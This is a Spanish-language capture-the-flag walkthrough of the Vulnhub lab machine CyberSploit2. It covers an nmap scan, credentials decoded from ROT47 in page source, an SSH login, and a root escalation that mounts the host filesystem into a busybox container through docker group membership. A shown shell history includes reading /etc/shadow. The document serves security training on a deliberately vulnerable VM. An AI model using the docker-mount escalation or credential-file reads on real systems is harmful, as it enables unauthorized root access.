Hoy vamos a hackear la maquina de Vulnhub llamada
Cybersploit2. Podeis descargarla desde el siguiente enlace:
https://www.vulnhub.com/entry/cybersploit-2,511/
Video
Enumeration
Empezamos con un nmap para ver que puertos
tiene abiertos.
~ > nmap -A -p- 192.168.1.46
22s
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-16 19:20 CEST
Nmap scan report for 192.168.1.46
Host is up (0.00092s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 ad:6d:15:e7:44:e9:7b:b8:59:09:19:5c:bd:d6:6b:10 (RSA)
| 256 d6:d5:b4:5d:8d:f9:5e:6f:3a:31:ad:81:80:34:9b:12 (ECDSA)
|_ 256 69:79:4f:8c:90:e9:43:6c:17:f7:31:e8:ff:87:05:31 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
|_http-title: CyberSploit2
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.11 seconds
En el codigo fuente de la web podemos encontrar el siguiente
comentario...
Teniendo la pista de ROT47, probamos con los
"codigos" mas raros que encontramos en la web:
D92:=6?5C2 4J36CDA=@:E`
Para hacer el decode usamos Cyberchef[1] y hacemos el decode de ROT47.
El resultado es:
shailendra cybersploit1
Tiene toda la pinta de ser los credenciales :)
Low shell
~ > ssh shailendra@192.168.1.46
17s
The authenticity of host '192.168.1.46 (192.168.1.46)' can't be established.
ECDSA key fingerprint is SHA256:uGYzWYklxeL1iDjLGh5cLrkGjTgqAJfxn3mkDaZ7C7M.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.46' (ECDSA) to the list of known hosts.
shailendra@192.168.1.46's password:
Last login: Wed Jul 15 12:32:09 2020
[shailendra@localhost ~]$ id
uid=1001(shailendra) gid=1001(shailendra) groups=1001(shailendra),991(docker)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
Miramos el fichero hint.txt haber si nos da
alguna pista.
[shailendra@localhost ~]$ cat hint.txt
docker
Miramos si el .bash_history tiene algo...
[shailendra@localhost ~]$ cat .bash_history
---SNIP---
whoami
pwd
cat /etc/shadow
su
docker -v
docker image ls
docker run busybox -it
docker run -i -t busybox
ls
cd
---SNIP---
Vemos que tiene varios comandos donde "juega"
con busybox...
Vamos a arrancar busybox.
[shailendra@localhost ~]$ docker run -i -t busybox
Unable to find image 'busybox:latest' locally
latest: Pulling from library/busybox
91f30d776fb2: Already exists
Digest: sha256:9ddee63a712cea977267342e8750ecbc60d3aab25f04ceacfa795e6fce341793
Status: Downloaded newer image for busybox:latest
Miramos la imagen.
[shailendra@localhost ~]$ docker image ls
REPOSITORY TAG IMAGE ID CREATED
SIZE
busybox latest c7c37e472d31 2 weeks ago
1.22MB
flag.txt
Usamos docker y la imagen de busybox para montar la raiz / del sistema, en la
maquina "dockerizada" y asi desde busybox que seremos root, podemos ver
el contenido de /, en este caso lo que nos interesa que es la flag
de root.
[shailendra@localhost ~]$ docker run -v /:/mnt/fuckfs -ti c7c37e472d31 /bin/sh
/ # cd /mnt/fuckfs
/mnt/fuckfs # ls
bin boot dev etc home lib lib64 media mnt opt proc
root run sbin srv sys tmp usr var
/mnt/fuckfs # cd root
/mnt/fuckfs/root # ls
anaconda-ks.cfg flag.txt get-docker.sh logs}
/mnt/fuckfs/root # cat flag.txt
__ ___ _ __ ___ __ _____ __
/ /` / / \ | |\ | / /`_ | |_) / /\ | | ( (`
\_\_, \_\_/ |_| \| \_\_/ |_| \ /_/--\ |_| _)_)
Pwned CyberSploit2 POC
share it with me twitter@cybersploit1
Thanks !
End
Y con esto ya seriamos root de la maquina :)
[1] https://gchq.github.io/CyberChef/
